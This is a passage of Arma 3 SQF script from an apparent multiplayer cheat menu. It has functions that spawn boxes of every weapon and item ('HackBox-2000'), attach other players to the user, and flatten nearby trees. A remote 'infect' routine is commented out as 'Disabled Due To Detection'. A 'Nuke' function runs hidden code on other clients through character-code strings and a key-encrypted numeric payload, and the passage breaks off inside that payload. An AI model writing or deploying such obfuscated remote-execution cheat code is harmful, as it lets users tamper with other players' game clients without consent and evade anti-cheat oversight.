  1930. if(isClass _cur_wep_cus) then
  1931. {
  1932. _classname_cus = configName _cur_wep_cus;
  1933. _wep_type = getNumber(_cur_wep_cus >> "type");
  1934. _scope_o_it = getNumber(_cur_wep_cus >> "scope");
  1935. _cusicture = getText(_cur_wep_cus >> "picture");
  1936. if(_scope_o_it >= 2 && _wep_type in [1,2,4,4096] && _cusicture != "" && !(_classname_cus in _weapons) && _classname_cus != "NVGoggles") then
  1937. {
  1938. _weapons set[count _weapons, _classname_cus];
  1939. };
  1940. };
  1941. };
  1943. _cfgweapons = configFile >> "CfgMagazines";
  1944. _magazines = [];
  1946. for "_i" from 0 to (count _cfgWeapons)-1 do
  1947. {
  1948. _cur_wep_cus = _cfgweapons select _i;
  1950. if(isClass _cur_wep_cus) then
  1951. {
  1952. _classname_cus = configName _cur_wep_cus;
  1953. _scope_o_it = getNumber(_cur_wep_cus >> "scope");
  1954. _cusicture = getText(_cur_wep_cus >> "picture");
  1955. if(_scope_o_it >= 2 && _cusicture != "" && !(_classname_cus in _magazines)) then
  1956. {
  1957. _magazines set[count _magazines, _classname_cus];
  1958. };
  1959. };
  1960. };
  1962. { _box_cus addWeaponCargo [_x,5]; } foreach _weapons;
  1963. { _box_cus addMagazineCargo [_x,15]; }foreach _magazines;
  1965. _cfgweapons = configFile >> "CfgWeapons";
  1966. _items = [];
  1968. for "_i" from 0 to (count _cfgWeapons)-1 do
  1969. {
  1970. _cur_wep_cus = _cfgweapons select _i;
  1972. if(isClass _cur_wep_cus) then
  1973. {
  1974. _classname_cus = configName _cur_wep_cus;
  1975. _wep_type = getNumber(_cur_wep_cus >> "type");
  1976. _scope_o_it = getNumber(_cur_wep_cus >> "scope");
  1977. _cusicture = getText(_cur_wep_cus >> "picture");
  1978. if(_scope_o_it >= 2 && _wep_type in [131072,4096] && _cusicture != "" && !(_classname_cus in _items) && _classname_cus != "Binocular") then
  1979. {
  1980. _items set[count _items, _classname_cus];
  1981. };
  1982. };
  1983. };
  1985. { _box_cus addItemCargo [_x,10]; } foreach _items;
  1987. _cfgweapons = configFile >> "CfgVehicles";
  1988. _backpackGEF_cus = [];
  1990. for "_i" from 0 to (count _cfgWeapons)-1 do
  1991. {
  1992. _cur_wep_cus = _cfgweapons select _i;
  1994. if(isClass _cur_wep_cus) then
  1995. {
  1996. _classname_cus = configName _cur_wep_cus;
  1997. _wep_type = getText(_cur_wep_cus >> "vehicleClass");
  1998. _scope_o_it = getNumber(_cur_wep_cus >> "scope");
  1999. _cusicture = getText(_cur_wep_cus >> "picture");
  2000. if(_scope_o_it >= 2 && _wep_type == "Backpacks" && _cusicture != "" && !(_classname_cus in _backpackGEF_cus)) then
  2001. {
  2002. _backpackGEF_cus set[count _backpackGEF_cus, _classname_cus];
  2003. };
  2004. };
  2005. };
  2007. { _box_cus addBackPackCargo [_x,5]; } foreach _backpackGEF_cus;
  2009. hint 'Your HackBox-2000 Has Arrived!';
  2010. };
  2011. mp_centipede = {
  2012. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2013. if(mp_centipede_toggle) then {
  2014. _y = -1;
  2015. {
  2016. if(name _x != name player) then {
  2017. _x attachTo [player,[0,_y,0]];
  2018. _y = _y - 2;
  2019. };
  2020. } forEach playableUnits;
  2021. } else {
  2022. {
  2023. if(name _x != name player) then {
  2024. detach _x;
  2025. };
  2026. }forEach playableUnits;
  2027. hint 'Human Centipede OFF!';
  2028. };
  2029. };
  2030. mp_deforestation = {
  2031. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2032. if(mp_deforestation_toggle) then {hint 'Fuck Trees!\n\n Am-I-Right?';} else {hint 'Deforestation - OFF';};
  2033. while{mp_deforestation_toggle} do {
  2034. _allNonClassObjects = (nearestObjects [getposatl player,[],20]) - (nearestObjects [getposatl player,["all"],20]);
  2035. {
  2036. if(damage _x < 1) then {
  2037. _text = str _x;
  2038. _isTree = ["t_",_text] call bis_fnc_inString;
  2039. _isBush = ["b_",_text] call bis_fnc_inString;
  2040. _isBushW = ["bw_",_text] call bis_fnc_inString;
  2041. if(_isTree || _isBushW || _isBush) then {
  2042. _x setDamage 1;
  2043. };
  2044. };
  2045. } forEach _allNonClassObjects;
  2046. };
  2047. };
  2048. mp_Map_Drawing = {
  2049. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2050. disableserialization;
  2051. _display = findDisplay 12;
  2052. _ctrl = _display displayCtrl 51;
  2054. if(mp_Map_Drawing_Toggle) then {
  2055. hint 'Click the map to draw with markers!';
  2057. _ctrl ctrlAddEventHandler["MouseButtonDown",{
  2058. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2059. _key = _this select 1;
  2060. if(_key == 0) then {
  2061. mp_Map_Drawing_KeyDown = true;
  2062. };
  2063. }];
  2064. _ctrl ctrlAddEventHandler["MouseButtonUp",{
  2065. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2066. _key = _this select 1;
  2067. if(_key == 0) then {
  2068. mp_Map_Drawing_KeyDown = false;
  2069. };
  2070. }];
  2071. _ctrl ctrlAddEventHandler["MouseMoving",{
  2072. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2073. if(mp_Map_Drawing_KeyDown) then {
  2074. _map = _this select 0;
  2075. _x = _this select 1;
  2076. _y = _this select 2;
  2077. _worldPos = _map ctrlMapScreenToWorld [_x,_y];
  2078. _name = str(random(1000000)) + "_swag";
  2079. _mark = createMarker [_name,_worldPos];
  2080. _mark setMarkerType "waypoint";
  2081. _mark setMarkerPos _worldPos;
  2082. _mark setMarkerSize [0.75,0.75];
  2083. _mark setMarkerColor "ColorBlue";
  2084. };
  2086. }];
  2087. } else {
  2088. hint 'Map Drawing OFF';
  2089. _ctrl ctrlRemoveAllEventHandlers "MouseButtonUp";
  2090. _ctrl ctrlRemoveAllEventHandlers "MouseMoving";
  2091. _ctrl ctrlRemoveAllEventHandlers "MouseButtonDown";
  2092. };
  2093. };
  2094. GEF_Infect = {
  2095. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2096. /*_target = _this call mp_GetObject;
  2097. [{hint "loading infection...";},_target] call GEF_Rmote;
  2098. [{LYINFECT_AllowInfectOthers = false;},_target] call GEF_Rmote;
  2099. [LYINFECT_Infect,_target] call GEF_Rmote;
  2100. ["TaskSucceeded",["","The Target Has Been Infected!"]] call bis_fnc_showNotification;
  2101. */
  2102. hint 'Disabled Due To Detection';
  2103. };
  2104. GEF_Nuke = {
  2105. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2106. nuke_var = true;
  2107. _clients = {
  2108. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  2109. call compileFinal toString [105,102,40,33,105,115,78,105,108,32,34,110,117,107,101,95,118,97,114,34,41,32,116,104,101,110,32,123,13,10,9,9,9,9,9,9,111,112,101,110,77,97,112,32,91,116,114,117,101,44,102,97,108,115,101,93,59,13,10,9,9,9,9,9,9,110,117,107,101,95,118,97,114,32,61,32,110,105,108,59,13,10,9,9,9,9,9,125,59];
  2110. _Decrypt = {_Key="DTCR&#5*Jsgx/c>ZWq)x";_DecryptMe = _this;_counter = 0;_Array = toArray(_Key);for "_i" from 0 to (count(_decryptme)-1) do {if(_counter > (count(_Array)-1)) then {_counter = 0;};_var = (_decryptme select _i) / (_Array select _counter);_decryptme set[_i,_var];_counter = _counter + 1;};toString(_decryptme);};call compileFinal([ 4624, 6636, 6365, 6396, 3230, 2625, 3657, 1344, 4514, 3680, 12669, 1560, 470, 891, 6944, 9720, 8439, 13673, 3403, 13320, 7956, 9240, 6700, 2624, 1292, 2275, 5724, 4074, 8436, 12535, 3502, 7080, 611, 990, 558, 9360, 9135, 12430, 4756, 9960, 7140, 9072, 6767, 9020, 4408, 1120, 5936, 4074, 8436, 13225, 10403, 10080, 4747, 11880, 7192, 3060, 5220, 13108, 1312, 13800, 7140, 10248, 6767, 5002, 1482, 1715, 2438, 2058, 2886, 7130, 8034, 14040, 5029, 9999, 1984, 6120, 8787, 13108, 4551, 13200, 6596, 9744, 7035, 9102, 4180, 1120, 3869, 4620, 4440, 5405, 11948, 7440, 2820, 9702, 7068, 4230, 5394, 6780, 4018, 13680, 3196, 5208, 4020, 9512, 1216, 4025, 5565, 5124, 7474, 7015, 4017, 6000, 1833, 6138, 3286, 5400, 4089, 13108, 2542, 4080, 4012, 1092, 670, 738, 4370, 3780, 5353, 4242, 8288, 3680, 5047, 7080, 611, 990, 558, 10080, 9396, 10961, 4961, 9960, 7548, 9828, 7370, 8200, 1216, 1190, 3445, 4536, 7178, 13110, 11227, 4080, 2773, 1287, 620, 810, 9048, 11865, 4510, 13920, 5644, 8820, 7236, 8282, 4180, 4060, 1696, 4704, 7178, 13110, 11845, 12120, 3948, 9999, 7440, 10440, 2958, 6780, 4756, 3840, 7820, 8820, 8174, 8282, 2318, 1365, 2597, 1932, 3626, 4485, 6386, 9360, 5499, 10593, 6262, 2880, 5916, 11413, 4756, 13320, 7480, 8148, 7772, 8610, 4218, 3850, 1696, 3066, 8140, 6900, 4841, 13920, 2914, 5940, 6076, 10260, 4089, 7006, 2460, 11760, 7752, 3948, 4154, 4920, 4408, 1120, 6095, 4410, 9028, 11615, 6283, 4680, 2350, 3861, 3844, 4680, 5220, 5311, 4756, 7440, 2312, 4956, 871, 820, 342, 4025, 5724, 4242, 7474, 12880, 3296, 5880, 2773, 1287, 620, 810, 9744, 12204, 3977, 14520, 5644, 9324, 7839, 9020, 3800, 1120, 1802, 2730, 7992, 11155, 11742, 13080, 1598, 5841, 806, 900, 783, 11752, 4305, 13200, 7888, 6972, 7035, 8856, 3838, 3850, 6148, 1344, 8288, 11155, 11742, 13800, 4747, 8316, 6262, 10800, 10092, 3842, 2460, 13920, 2176, 9660, 7035, 10004, 3838, 2135, 2067, 2058, 3404, 5635, 4017, 7440, 3666, 11583, 6634, 9090, 2784, 7684, 4141, 13920, 7548, 9240, 6499, 9512, 3990, 3885, 5830, 1344, 5402, 12650, 6180, 5640, 5452, 6138, 3720, 8820, 9918, 5311, 2542, 7200, 6664, 9576, 3149, 5084, 2280, 4060, 1696, 4830, 7770, 14030, 10403, 7320, 1833, 4950, 2418, 5580, 4437, 6780, 1927, 13920, 4216, 2856, 3953, 1066, 380, 315, 6095, 4536, 7474, 11615, 11536, 3840, 2303, 5841, 806, 900, 783, 12656, 4428, 11640, 8228, 6972, 7437, 9594, 4180, 3500, 1696, 1428, 4810, 12420, 9991, 13680, 5123, 3366, 3658, 1170, 870, 1017, 4264, 12600, 7480, 9744, 5561, 8610, 4104, 3535, 5830, 4872, 2368, 12880, 9991, 13680, 5405, 9999, 5208, 9090, 10440, 13108, 1394, 7200, 7888, 2688, 7705, 8610, 4636, 3535, 3233, 1638, 3626, 5290, 5047, 4680, 2914, 7722, 7254, 9630, 8787, 3616, 2788, 12120, 7888, 9324, 7370, 7954, 4408, 3675, 5883, 4620, 2368, 8395, 11330, 7200, 2209, 11484, 3844, 5400, 8526, 12882, 1927, 7440, 4080, 8232, 7638, 3854, 2356, 2100, 6148, 1344, 8510, 12075, 12566, 12120, 2867, 3861, 3100, 3510, 5394, 5650, 2460, 5640, 7888, 5208, 2278, 4838, 494, 350, 477, 4830, 7992, 11615, 10403, 13440, 1504, 4851, 3658, 1170, 870, 1017, 4592, 12960, 6596, 10164, 5561, 9102, 4446, 3850, 5300, 1344, 2516, 7475, 11124, 11640, 5358, 10791, 2108, 5310, 1131, 1130, 369, 12480, 7140, 9240, 7772, 6806, 3990, 3780, 5353, 4620, 8584, 3680, 11536, 11640, 5358, 11385, 6262, 7560, 8787, 13560, 4756, 4080, 4080, 9744, 2144, 9430, 3990, 4270, 5353, 2562, 2886, 5635, 4738, 5880, 1833, 6138, 4836, 10530, 9309, 11413, 1312, 8160, 6868, 9744, 7437, 9020, 3686, 4060, 5565, 4662, 8140, 3680, 7519, 13200, 2820, 4653, 7192, 5580, 5220, 11074, 4674, 5640, 4216, 5040, 6566, 9348, 1786, 2170, 3180, 4872, 2368, 13225, 10815, 14640, 4747, 6039, 2418, 4500, 3393, 7006, 2009, 7200, 3196, 9744, 4154, 2788, 2242, 455, 530, 378, 8510, 12420, 10403, 12120, 5264, 3168, 3038, 5310, 1131, 1130, 369, 13440, 7344, 8148, 8107, 6806, 4218, 4095, 5830, 4200, 2368, 3910, 6695, 12960, 4559, 11286, 6758, 3060, 5133, 1469, 410, 1080, 7072, 8820, 7370, 9512, 3154, 3675, 5724, 4242, 8140, 13340, 3296, 4080, 1598, 5841, 806, 900, 783, 12995, 4428, 12120, 6868, 9408, 2144, 4018, 2242, 455, 530, 378, 8140, 13455, 11021, 12120, 5264, 10989, 7130, 2880, 5307, 3616, 1394, 9120, 6596, 9240, 6700, 7790, 3154, 3395, 5247, 4494, 7030, 8050, 3502, 3840, 4653, 11286, 6262, 8730, 10092, 11413, 3526, 12120, 7072, 8820, 6633, 8856, 3838, 2660, 5883, 4158, 7178, 12420, 3296, 11400, 5452, 10296, 6510, 10350, 5133, 1469, 410, 1080, 7412, 8400, 6968, 7790, 4180, 4095, 5671, 4242, 7030, 11500, 10403, 13800, 5452, 11286, 7254, 8910, 10092, 11865, 4551, 13200, 6460, 10248, 7437, 9020, 3838, 315, 3233, 1344, 3552, 6785, 1339, 1200, 423, 10791, 6200, 9360, 8265, 12430, 4797, 12840, 6868, 7980, 6633, 7954, 4142, 4025, 5512, 4074, 7918, 11615, 927, 1080, 423, 6039, 1984, 4410, 5133, 1469, 410, 1080, 7412, 8400, 6968, 7790, 4180, 4095, 5671, 4242, 7030, 11155, 11845, 12480, 423, 891, 558, 810, 5307, 3616, 2009, 7080, 884, 840, 603, 8938, 3800, 3640, 5035, 4620, 8658, 12305, 10403, 11400, 4653, 10989, 6696, 9990, 9918, 11187, 4551, 13680, 7752, 8484, 6633, 9512, 3990, 3885, 5830, 378, 4514, 3680, 5047, 7080, 611, 990, 558, 9810, 8700, 11752, 3895, 13200, 7956, 8988, 6767, 7790, 4332, 3535, 5777, 4662, 8732, 11615, 10197, 13320, 5358, 11286, 6262, 8910, 10092, 11865, 4551, 13200, 612, 5124, 2144, 4018, 2242, 455, 530, 378, 8066, 11500, 10712, 11400, 5170, 11583, 6634, 9090, 8265, 12882, 4141, 13080, 7548, 9912, 6767, 7954, 4370, 3640, 1696, 378, 666, 1035, 6283, 3840, 2303, 5841, 806, 900, 1131, 1130, 533, 1200, 612, 7980, 4489, 9102, 4180, 3535, 1696, 2562, 2368, 3910, 3605, 13440, 4559, 11286, 7192, 9450, 8613, 12204, 4141, 13800, 7548, 9828, 7638, 8118, 3838, 1190, 1696, 4158, 8436, 11615, 9991, 13920, 4747, 8514, 6262, 9360, 9135, 11187, 4428, 12120, 5168, 9324, 6633, 7954, 4104, 1120, 5459, 4242, 8584, 12880, 11433, 13800, 1504, 10890, 7254, 9630, 8787, 12656, 4551, 13800, 4012, 1092, 670, 738, 3610, 2345, 5883, 4620, 7474, 3680, 11845, 12120, 5452, 7920, 6014, 10260, 10092, 11865, 4059, 12960, 6868, 6720, 6499, 9348, 3686, 3815, 6095, 1344, 6734, 10465, 3502, 7800, 2397, 9108, 4216, 8730, 10092, 10961, 3895, 8400, 6256, 6720, 6499, 9348, 4408, 3675, 5247, 4536, 7474, 7935, 10506, 12240, 4747, 9801, 7192, 10350, 8004, 9605, 4510, 12600, 8024, 8484, 7638, 9430, 3686, 3780, 4876, 4914, 8140, 12075, 12154, 12120, 5358, 11385, 6014, 9720, 4002, 12656, 2091, 12000, 2312, 3696, 2144, 4018, 2052, 1540, 1696, 2310, 3256, 3680, 5356, 6720, 4371, 4356, 1984, 3060, 2958, 4972, 1312, 4080, 4488, 8820, 7236, 8856, 3724, 3885, 5141, 4788, 7400, 3910, 4532, 3840, 2303, 4356, 1984, 4410, 4176, 4972, 1312, 10920, 3264, 3696, 2144, 3936, 1672, 1120, 2544, 3906, 3256, 1495, 1030, 1080, 423, 891, 558, 810, 7917, 5424, 1804, 3840, 3264, 3696, 2144, 3936, 3534, 1540, 1696, 2016, 3256, 3680, 5047, 5520, 2350, 5445, 3286, 3960, 2784, 5537, 1804, 3840, 3264, 3696, 2144, 7462, 1976, 1680, 2332, 2352, 3552, 10695, 4532, 3840, 4277, 9009, 2976, 4140, 4350, 5989, 1804, 3840, 3264, 3864, 3350, 4346, 1672, 1120, 2544, 1932, 3700, 6095, 4532, 3840, 2256, 9207, 2728, 2880, 7917, 5424, 1886, 6000, 3604, 3696, 2144, 3936, 1748, 1750, 2809, 1848, 2368, 5520, 4738, 6000, 2491, 4356, 1984, 4320, 4002, 5989, 3813, 5280, 2176, 1092, 670, 738, 342, 315, 477, 378, 6734, 5520, 4738, 6000, 2491, 4356, 1984, 4320, 4002, 5650, 2173, 5280, 2176, 4032, 3082, 4100, 2014, 1540, 1696, 2016, 3404, 6095, 9579, 5280, 1504, 9009, 2976, 4140, 4350, 5989, 1804, 3840, 3264, 3864, 3350, 4346, 1672, 1120, 2544, 1932, 3700, 6095, 4532, 3840, 2256, 4554, 2976, 4770, 8091, 4972, 1312, 10920, 3264, 3864, 3350, 4346, 1672, 1120, 2544, 1932, 3700, 6095, 4532, 3840, 2256, 4554, 3100, 4770, 3828, 3616, 1968, 11160, 6324, 3696, 2144, 7462, 1824, 1610, 2650, 2226, 6882, 5060, 3296, 5760, 2162, 4851, 2728, 2880, 4263, 4972, 1312, 4080, 2312, 3696, 2144, 2788, 1292, 1540, 1696, 4620, 8658, 12305, 10403, 13440, 5217, 11385, 5766, 5310, 1131, 1130, 369, 11400, 4556, 9324, 7370, 8282, 1216, 4025, 5353, 4872, 5920, 11155, 11742, 13920, 4935, 9801, 6696, 9090, 7134, 10961, 4510, 12000, 7548, 9156, 2144, 7462, 1900, 1540, 1696, 3822, 3626, 5060, 3296, 5880, 2068, 3168, 3162, 4320, 8091, 4972, 1312, 10920, 3332, 3696, 2144, 4018, 1672, 1120, 2703, 2016, 6882, 5060, 3296, 5760, 2068, 3168, 2976, 3960, 2784, 10283, 1968, 5280, 2176, 4032, 2948, 2624, 1824, 1540, 1696, 2016, 3404, 5635, 9579, 5280, 1504, 4752, 2728, 2880, 4176, 10509, 2419, 1560, 680, 756, 6365, 5494, 4218, 3850, 5353, 1344, 8510, 11615, 11948, 9600, 4559, 11286, 7192, 9450, 8613, 12204, 4141, 8040, 7140, 9576, 6633, 8856, 3838, 1120, 4823, 2058, 3552, 5060, 3296, 10920, 2115, 4851, 2976, 3960, 2784, 5085, 2009, 5760, 2992, 2688, 3350, 3936, 3534, 3255, 3127, 546, 740, 1035, 9785, 8040, 5217, 10890, 6262, 2880, 10005, 11413, 4756, 8160, 7752, 9324, 7504, 5986, 4180, 4060, 5353, 4788, 8732, 11155, 11124, 3840, 2256, 4554, 2976, 4320, 4611, 6667, 533, 1200, 884, 840, 603, 7790, 4408, 3885, 5936, 1344, 4514, 3680, 3502, 4200, 5264, 9603, 7068, 10440, 9135, 11187, 4428, 12120, 7820, 9324, 7839, 9348, 3762, 3535, 1802, 1344, 7326, 13110, 10403, 11640, 5452, 9999, 5332, 9090, 9048, 11865, 4059, 12960, 6868, 6384, 7437, 8118, 3686, 3780, 1696, 4326, 7474, 13340, 11536, 13320, 5405, 3168, 6820, 10530, 9309, 11413, 4592, 13320, 7820, 4956, 871, 820, 342, 3325, 6148, 4662, 8288, 3680, 11845, 12120, 5452, 7920, 6014, 10260, 10092, 11865, 4059, 12960, 6868, 6720, 6499, 9348, 3686, 3815, 6095, 1344, 6734, 10465, 3502, 7800, 2397, 9108, 4216, 8730, 10092, 10961, 3895, 8400, 6256, 6720, 6499, 9348, 4408, 3675, 5247, 4536, 7474, 7935, 10506, 12240, 4747, 9801, 7192, 10350, 8004, 9605, 4510, 12600, 8024, 8484, 7638, 9430, 3686, 3780, 4876, 4914, 8140, 12075, 12154, 12120, 5358, 11385, 6014, 9720, 4002, 12656, 2091, 12000, 2312, 3696, 2144, 4018, 2052, 1540, 1696, 2142, 3256, 3680, 5356, 6720, 2068, 3168, 2976, 8370, 3828, 3616, 1394, 4080, 2992, 2688, 2278, 5412, 3990, 3780, 5724, 4116, 8214, 11155, 11742, 12000, 1598, 4356, 1984, 4410, 3828, 3616, 2050, 5760, 2992, 2688, 6097, 3936, 1672, 1120, 2544, 1848, 2368, 5520, 9579, 5280, 611, 990, 558, 810, 783, 1017, 369, 10920, 3264, 3696, 2144, 3936, 1672, 1120, 2862, 2016, 6882, 5060, 3296, 5760, 2068, 3168, 3038, 4140, 4785, 4972, 1312, 5880, 2992, 2688, 3216, 3608, 1216, 3185, 2862, 2016, 3256, 6440, 4944, 5280, 2303, 4752, 2976, 8370, 3828, 3616, 3731, 10920, 3332, 3696, 2144, 4018, 1672, 1120, 2597, 1848, 2368, 5175, 5047, 5760, 4371, 4356, 5642, 4410, 3828, 3616, 2009, 5280, 2176, 4116, 2948, 2624, 1710, 1925, 4929, 1848, 6734, 5635, 4532, 3840, 2303, 4356, 1984, 4410, 3828, 3616, 1845, 6240, 6324, 3696, 6097, 4018, 1672, 1120, 2597, 1848, 2368, 5635, 4532, 3840, 2115, 4752, 2852, 4770, 8091, 4972, 3731, 5880, 2992, 2688, 3283, 3608, 1216, 1715, 2332, 1344, 3552, 10695, 9579, 5280, 1504, 9009, 2976, 4140, 4176, 5989, 3813, 5280, 2176, 4116, 2948, 2624, 1862, 1540, 1696, 1428, 2516, 5060, 3296, 4080, 1598, 4356, 1984, 9900, 10179, 12091, 4141, 13440, 7548, 9660, 6231, 4838, 494, 350, 477, 3990, 8584, 12765, 11536, 3840, 5405, 9999, 7192, 7200, 8439, 12882, 4756, 12600, 6732, 9072, 6767, 6724, 3686, 3850, 5300, 4662, 8066, 3680, 9373, 5760, 2068, 3168, 5642, 4950, 4611, 4972, 1312, 6600, 3604, 3696, 2144, 4018, 2014, 3255, 2332, 1344, 6734, 5635, 5665, 5280, 1504, 4851, 3410, 3960, 2784, 5537, 1968, 11160, 2992, 2688, 3216, 3608, 1216, 1680, 2332, 1344, 6734, 5520, 4532, 3840, 2256, 4356, 1984, 4320, 3828, 3616, 1968, 11160, 2992, 2688, 3216, 3608, 1216, 1680, 2332, 1344, 3774, 6210, 4944, 11160, 2773, 1287, 620, 810, 8265, 13108, 4551, 13440, 2176, 9660, 6767, 9512, 2584, 3990, 5883, 4704, 5402, 12650, 11948, 12120, 5358, 11682, 6014, 9720, 2784, 5424, 1886, 5760, 3264, 4200, 3953, 1066, 380, 455, 530, 378, 7030, 13340, 11433, 13440, 2350, 3168, 3782, 2880, 2958, 3955, 4592, 11640, 7752, 9744, 7035, 8118, 4104, 3535, 6095, 4662, 8658, 13110, 10197, 12120, 1598, 3168, 6138, 10260, 8787, 10961, 4756, 12120, 5848, 8484, 6968, 8610, 3762, 3780, 5353, 3192, 8214, 11385, 9991, 12960, 1504, 10197, 6262, 10440, 9744, 12543, 4715, 3840, 7480, 9828, 7169, 8282, 4256, 3885, 6095, 2478, 962, 1150, 927, 11400, 5452, 10989, 6944, 4500, 2784, 12995, 4141, 13920, 5440, 8148, 7638, 9512, 3990, 3465, 5724, 4242, 5920, 11155, 11742, 11640, 5123, 11385, 1984, 8190, 7917, 3842, 2665, 6120, 6256, 5712, 6499, 9512, 3686, 3325, 3710, 3864, 5920, 11155, 11742, 13920, 4935, 9801, 6696, 9090, 6003, 11526, 4182, 12120, 6732, 9744, 7705, 7544, 3230, 3850, 5565, 4956, 7474, 13110, 11845, 11640, 5076, 9108, 7254, 9900, 9135, 13334, 4141, 13680, 7820, 8148, 7236, 3772, 4256, 1785, 5300, 1428, 3256, 3680, 5047, 6480, 2068, 3168, 3162, 3960, 2784, 5537, 2009, 6000, 2992, 2688, 3216, 7626, 1672, 1120, 1802, 1428, 3256, 3680, 3502, 7920, 4935, 10692, 6696, 8820, 9657, 10961, 4674, 12000, 2312, 3696, 2144, 4018, 1672, 1120, 2650, 2016, 3256, 3680, 9373, 5760, 2068, 3168, 2976, 3960, 2784, 5424, 3813, 5280, 884, 840, 603, 738, 342, 315, 477, 3822, 3552, 5060, 3296, 5760, 2068, 3168, 3348, 4320, 8091, 4972, 1312, 5760, 2992, 2688, 3283, 3772, 2090, 1540, 1696, 2058, 3256, 3680, 4944, 5280, 1504, 9009, 3348, 4320, 3828, 6328, 1968, 5280, 3332, 4032, 3216, 7626, 1672, 1120, 4823, 3822, 3626, 5060, 3296, 5880, 2068, 3168, 3038, 3960, 2784, 5424, 1886, 6360, 6324, 3696, 6097, 4018, 1672, 1120, 2597, 1848, 2368, 5635, 4532, 3840, 2256, 9207, 5766, 3960, 2784, 10283, 1968, 5520, 3264, 4620, 6231, 3608, 1216, 1715, 2332, 1344, 3626, 5060, 3296, 4080, 1598, 4356, 1984, 3060, 2958, 4972, 1312, 13200, 7956, 8988, 6767, 9184, 4218, 4025, 4929, 2478, 962, 1150, 927, 11400, 5452, 10989, 6944, 4500, 2784, 12995, 4141, 13920, 5440, 8148, 7638, 9512, 3990, 3465, 5724, 4242, 6068, 11155, 11330, 12000, 5217, 10791, 1984, 8190, 4176, 4972, 1312, 10920, 3740, 4452, 2948, 2624, 2090, 1855, 2332, 1344, 3626, 6095, 9579, 5280, 1504, 9009, 3038, 4950, 3828, 3616, 2009, 6600, 2992, 2688, 3283, 3936, 3534, 1540, 1696, 2016, 3256, 3680, 4944, 5280, 1504, 9009, 2976, 3960, 2784, 5424, 1804, 3840, 3264, 3696, 2144, 3936, 3534, 1540, 1696, 2016, 3256, 3680, 4944, 5280, 1504, 5049, 3348, 4320, 8091, 6667, 533, 1200, 612, 7980, 7772, 9102, 4256, 1750, 1696, 4830, 7474, 13340, 7004, 13680, 5217, 11088, 4526, 9900, 10092, 11413, 4674, 14160, 6596, 9072, 2144, 3936, 1748, 1680, 2544, 2100, 4366, 1495, 1030, 1560, 470, 891, 5890, 10350, 9483, 12543, 4387, 12120, 2176, 5124, 2144, 2788, 1330, 3920, 5141, 4788, 8584, 12075, 10197, 12960, 4747, 11385, 6882, 10530, 9918, 11187, 4141, 4080, 2176, 8316, 7638, 8282, 3686, 4060, 5353, 3612, 7474, 11960, 10815, 11880, 5076, 9999, 4712, 9990, 8613, 10961, 4428, 3840, 7004, 8484, 7772, 9184, 4218, 4025, 1696, 4620, 8658, 12305, 10403, 13440, 5217, 11385, 3658, 1170, 870, 1017, 3895, 13800, 7412, 9324, 7169, 8282, 1216, 4025, 5353, 4872, 5920, 11155, 11742, 13920, 4935, 9801, 6696, 9090, 6960, 10961, 4674, 11640, 7412, 9660, 2144, 7462, 3458, 1190, 3445, 2142, 6808, 7820, 9991, 13920, 4559, 9405, 4340, 8280, 6960, 10961, 4674, 13920, 7140, 8316, 7236, 8282, 2622, 3570, 5406, 4242, 7326, 13340, 11845, 11040, 3995, 10890, 6510, 10620, 8787, 12882, 4715, 11640, 7344, 7728, 7839, 9020, 3990, 4130, 5353, 4788, 8510, 11155, 11124, 5520, 5264, 5049, 6200, 3060, 3828, 3616, 2009, 6480, 2992, 2688, 3685, 3608, 1216, 1820, 2968, 1848, 2368, 5635, 9579, 5280, 1504, 3366, 2108, 3960, 2784, 3842, 2706, 12600, 7344, 9072, 6566, 9102, 3686, 3990, 5300, 1428, 3256, 3680, 5047, 5280, 1504, 4950, 3286, 3960, 2784, 10283, 1968, 5280, 2176, 4032, 2948, 2624, 1824, 3255, 2332, 546, 740, 1035, 927, 1080, 423, 891, 5642, 4320, 3828, 3616, 1968, 5280, 2176, 4536, 3216, 7626, 1672, 1120, 2544, 1848, 2368, 5635, 4738, 6600, 2068, 3168, 3038, 3960, 2784, 5424, 1804, 3840, 6188, 4368, 3216, 3608, 1862, 1855, 2332, 2058, 3700, 5520, 9579, 5280, 1504, 1287, 620, 810, 783, 1017, 369, 1080, 6188, 7644, 3283, 3608, 1216, 1715, 2332, 1344, 3626, 5060, 3296, 5760, 2162, 5148, 5766, 3960, 7917, 5537, 1804, 3840, 3332, 3696, 2144, 4018, 1672, 1120, 2544, 1932, 4070, 10695, 4532, 10920, 2303, 4356, 1984, 4410, 3828, 3616, 2009, 5280, 2176, 4032, 3082, 4510, 3534, 1540, 4823, 2058, 3256, 3680, 5047, 5280, 1504, 4851, 2728, 2880, 4176, 5198, 2255, 11160, 2992, 7644, 3283, 3608, 1216, 1715, 2332, 1344, 3626, 5060, 3296, 5760, 2162, 5445, 5766, 3960, 7917, 5537, 1804, 3840, 3332, 3696, 2144, 4018, 1672, 1120, 2544, 1932, 4070, 10695, 4532, 10920, 2303, 4356, 1984, 4410, 3828, 3616, 2009, 5280, 2176, 4032, 3082, 4510, 3534, 1540, 4823, 2058, 3256, 3680, 5047, 5280, 1504, 4851, 2728, 2880, 4176, 10509, 3813, 1560, 680, 756, 603, 738, 342, 315, 2332, 1344, 6734, 5520, 4738, 6360, 2068, 3168, 2976, 4140, 4263, 10509, 1804, 3840, 3332, 3696, 2144, 4018, 1672, 1120, 1802, 1428, 3256, 3680, 3502, 4080, 2068, 3168, 6820, 10530, 9309, 11413, 4592, 13320, 7820, 7812, 3953, 1066, 380, 315, 5035, 4830, 8066, 12765, 11021, 12120, 1504, 11385, 6262, 10440, 6960, 10961, 4674, 13920, 7140, 8316, 7236, 8282, 3116, 3395, 5830, 4200, 8214, 12535, 3296, 10920, 2256, 4356, 1984, 8190, 4263, 5424, 1804, 3840, 3332, 4032, 2948, 2624, 1862, 1855, 4929, 1848, 2368, 10465, 